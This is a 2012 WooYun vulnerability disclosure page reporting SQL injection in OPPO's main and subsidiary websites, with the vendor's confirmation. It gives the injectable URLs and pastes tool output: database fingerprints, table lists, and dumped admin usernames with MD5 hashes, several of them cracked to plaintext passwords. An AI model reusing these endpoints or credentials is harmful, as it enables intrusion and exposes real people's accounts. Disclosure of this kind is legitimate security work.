oppo SQL Injection 分站与主站，并登陆后台

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013943

漏洞标题：oppo SQL Injection 分站与主站，并登陆后台

漏洞作者： luom

提交时间：2012-10-29 17:20

修复时间：2012-12-13 17:21

公开时间：2012-12-13 17:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-10-29：细节已通知厂商并且等待厂商处理中
2012-10-30：厂商已经确认，细节仅向厂商公开
2012-11-09：细节向核心白帽子及相关领域专家公开
2012-11-19：细节向普通白帽子公开
2012-11-29：细节向实习白帽子公开
2012-12-13：细节向公众公开

简要描述：

SQL注入害人啊
除了主站找不到后台分站全能破密码进后台

详细说明：

主站的：
http://www.oppo.com/index.php?q=mobile/product/detail&name=finder
分站的：
http://theme.oppo.com/?q=user/authordetail&author=1 （这变过型的）
http://union.oppo.com//?act=u_example_more&itemid=862

Target: 		http://www.oppo.com/index.php?q=mobile/product/detail&name=finder
Host IP:		115.236.98.124
Web Server: 	nginx
Powered-by: 	youaremoon/1.0
DB Server: 	MySQL error based
Resp. Time(avg):	121 ms
Sql Version: 	5.0.51a-24+lenny2+spu1-log
Current DB: 	oppo_www
Host Name: 	hz0001
Installation dir: 	/usr/

+------------------------------+
| HrefStat                     |
| Tetris                       |
| attachment                   |
| ipfilter                     |
| mobilenet_attachment         |
| oppo_aggragation             |
| oppo_android_heat            |
| oppo_apk_downloads           |
| oppo_article                 |
| oppo_article_comment         |
| oppo_article_content         |
| oppo_assistant_feedback      |
| oppo_category                |
| oppo_ebook                   |
| oppo_editor_link             |
| oppo_editor_link_class       |
| oppo_globalfocus             |
| oppo_mobile                  |
| oppo_mobile_activation       |
| oppo_mobile_faq              |
| oppo_mobile_faq_category     |
| oppo_mobile_music            |
| oppo_mobile_music_category   |
| oppo_mobile_theme            |
| oppo_mobilenet               |
| oppo_mobilenet_news          |
| oppo_mp3                     |
| oppo_nearmeapk               |
| oppo_page                    |
| oppo_serviceqq               |
| oppo_softapk                 |
| oppo_softbeta                |
| oppo_softimage               |
| oppo_software                |
| oppo_stat                    |
| oppo_threadlist_record       |
| rom_updatelog                |
| search_record                |
| service_support_faq          |
| service_support_network      |
| service_support_opposhop     |
| service_support_opposhop_pic |
| ticket                       |
| ticketcode                   |
+------------------------------+
Target: 		http://theme.oppo.com/?q=user/authordetail&author=1
Host IP:		115.236.98.106
Web Server: 	nginx
Powered-by: 	Zandy/1.0
DB Server: 	MySQL error based
Resp. Time(avg):	901 ms
Sql Version: 	5.0.51a-24+lenny2+spu1-log
Current DB: 	oppo_med
Host Name: 	hz0001
Installation dir: 	/usr/
+----------------------+
| sys_access_pca       |
| sys_account          |
| sys_permission       |
| sys_role             |
| sys_user_role        |
| temptable            |
| theme_buy            |
| theme_comments       |
| theme_dowloads_daily |
| theme_downloads      |
| theme_downloads_bak  |
| theme_global_var     |
| theme_images         |
| theme_images_tags    |
| theme_phones         |
| theme_recom          |
| theme_usernames      |
| themes               |
+----------------------+
http://theme.oppo.com/index.php?q=admin/main/index/index
Data Found: acct_alias=Dual
Data Found: acct_pswd=1124239fa53dbdabf3bef3f7fa414fc7
Data Found: acct_alias=editorfeedback
Data Found: acct_pswd=fb5e36aea8933f74d2254293ab223b4a
Data Found: acct_alias=ljdguy
Data Found: acct_pswd=9f649a417bde88a442a49787d1532270
Data Found: acct_alias=panlirong
Data Found: acct_pswd=6f97ad44a169e3b54d23f1ab14467eb2
Data Found: acct_alias=scadmin
Data Found: acct_pswd=e10adc3949ba59abbe56e057f20f883e
Data Found: acct_alias=simonx
Data Found: acct_pswd=596e45df95620ba4a823346b09cd1dcd
Data Found: acct_alias=tomkai
Data Found: acct_pswd=915b8a21da27e15b068e3bfd18ac810c
Data Found: acct_alias=yangbo
Data Found: acct_pswd=f25a2fc72690b780b2a14e140ef6a9e0
Data Found: acct_alias=youaremoon
Data Found: acct_pswd=f25a2fc72690b780b2a14e140ef6a9e0
Data Found: acct_alias=zhangkai
Data Found: acct_pswd=915b8a21da27e15b068e3bfd18ac810c
Dual   zople2
scadmin   123456
simonx  850401 
tomkai  5264316
zhangkai  5264316
http://union.oppo.com//?act=u_example_more&itemid=862
Target: 		http://union.oppo.com//?act=u_example_more&itemid=862
Host IP:		115.236.98.111
Web Server: 	nginx/1.0.14
Powered-by: 	PHP/5.3.10
DB Server: 	MySQL error based
Resp. Time(avg):	1400 ms
Sql Version: 	5.0.51a-24+lenny2+spu1-log
Current DB: 	oppo_union
Host Name: 	hz0001
Installation dir: 	/usr/
+------------+
| attachment |
| manager    |
| project    |
| thread     |
| universe   |
| users      |
+------------+
Data Found: mname=anhui_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e      666666
Data Found: mname=beijing_admin
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=changchun_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=changsha_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=chengdu_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e   666666
Data Found: mname=chongqing_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=dalian_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=dongguan_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=fujian_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=fuzhou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=guangdong_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=guangzhou_admin
Data Found: password=4607e782c4d86fd5364d7e4508bb10d9
Data Found: mname=guiyang_admin
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=haikou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=hangzhou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=hebei_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=hefang
Data Found: password=96e79218965eb72c92a549dd5a330112
Data Found: mname=heilongjiang_admin
Data Found: password=3f2cc21abe08ed16faf0447d4ceedadd
Data Found: mname=henan_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=hudou
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=jiangmen_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=jilin_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=jinan_admin
Data Found: password=d6b5152fab5ee0ebf532600f125668d5
Data Found: mname=jinan_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=kunming_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=lancewxy
Data Found: password=9b56c8461dfff862e3b969005f09634f     70048703
Data Found: mname=lanzhou_admin
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=liaoning_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=mocca_1988
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=nanchang_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=nanjing_admin
Data Found: password=2eefb2466f2fbfacd6983ba4d568afc7
Data Found: mname=nanning_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=neimenggu_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=neimeng_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=ningbo_admin
Data Found: password=bfd925fa86084bd0300fde7fd05ddd97
Data Found: mname=ningxia_amind
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=oppo
Data Found: password=d0177c27e6d765e9bc00213ed1a2d45c     plr2012
Data Found: mname=OPPO-1
Data Found: password=f5bb0c8de146c67b44babbf4e6584cc0
Data Found: mname=OPPO-THAI
Data Found: password=571317d635ddecd6efbf681301f5183f
Data Found: mname=oppo-wxy
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=oppo-xq
Data Found: password=c2bd6ed6ee8d32342424282f14abdc8a
Data Found: mname=oppockl
Data Found: password=5bfced9266d09d779c684f959374f99f
Data Found: mname=oppotest
Data Found: password=6001218a918da7598f55b0d77abdd8ae
Data Found: mname=putian_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=qc
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: mname=qc
Data Found: password=2423f7dd338c8a11e2c944b16322dd25
Data Found: mname=qinghai_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=qq276215243
Data Found: password=fb8d98be1265dd88bac522e1b2182140
Data Found: mname=quanzhou_admin
Data Found: password=f0bc7887febfd2c662ef8293e170a03a
Data Found: mname=reven
Data Found: password=aeda3a582845ad824a5b07c6ff97d502
Data Found: mname=richard17
Data Found: password=f5bb0c8de146c67b44babbf4e6584cc0
Data Found: mname=shanghai_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=shanghai_admin
Data Found: password=8d1d26f9b7e4b7596f38f3e497aa793b
Data Found: mname=shaoxing_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=shenyang_admin
Data Found: password=e99a18c428cb38d5f260853678922e03
Data Found: mname=shenzhen_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=taiyuan_admin
Data Found: password=06384919de9bad1291e74b6306876e66
Data Found: mname=wenzhou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=wmj
Data Found: password=de3bf75d8c70c50ec2fe675034f43e80
Data Found: mname=wuhan_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=wulumuqi_admin
Data Found: password=4e0b58f79a0acfb3357a1bc3e0299384
Data Found: mname=xiamen_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=xian_admin
Data Found: password=ffd2374068265d7eac8363e93a4f9bcd
Data Found: mname=yuedong_admin
Data Found: password=81e4cfb1ec23c7b1e7473aa8a649376b
Data Found: mname=zhangzhou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=zhejiang_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=zhejiang_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=zhengzhou_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Data Found: mname=zhongshan_admin
Data Found: password=f379eaf3c831b04de153469d1bec345e
Turning on 'bypass illegal union' and retrying!
Data Found: mname=
Data Found: password=933fd54934030a5d6b4f3d7e35cb1e7f
Data Found: mname=陈耿波
Data Found: password=9b8492a18ee98318d1773a302bb31e39
弱口令很多

漏洞证明：

唉排版有点乱，请不要见意

修复方案：

过滤把，强大的密码吧。

版权声明：转载请注明来源 luom@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2012-10-30 09:21

厂商回复：

主站的那个注入点前几天我们自查的时候已经发现并提交给相关部分去修复了，分站也的确存在不少问题，我们正在整改中，感谢luom 对OPPO的关注！

漏洞评价：

2012-10-29 19:11 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

我表示住站的的后台已通过xss成功打入内部，只是没有操作权限

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013943

漏洞标题：oppo SQL Injection 分站与主站，并登陆后台

相关厂商：广东欧珀移动通讯有限公司

漏洞作者： luom

提交时间：2012-10-29 17:20

修复时间：2012-12-13 17:21

公开时间：2012-12-13 17:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 luom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013943

漏洞标题：oppo SQL Injection 分站与主站，并登陆后台

相关厂商：广东欧珀移动通讯有限公司

漏洞作者： luom

提交时间：2012-10-29 17:20

修复时间：2012-12-13 17:21

公开时间：2012-12-13 17:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-013943"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 luom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：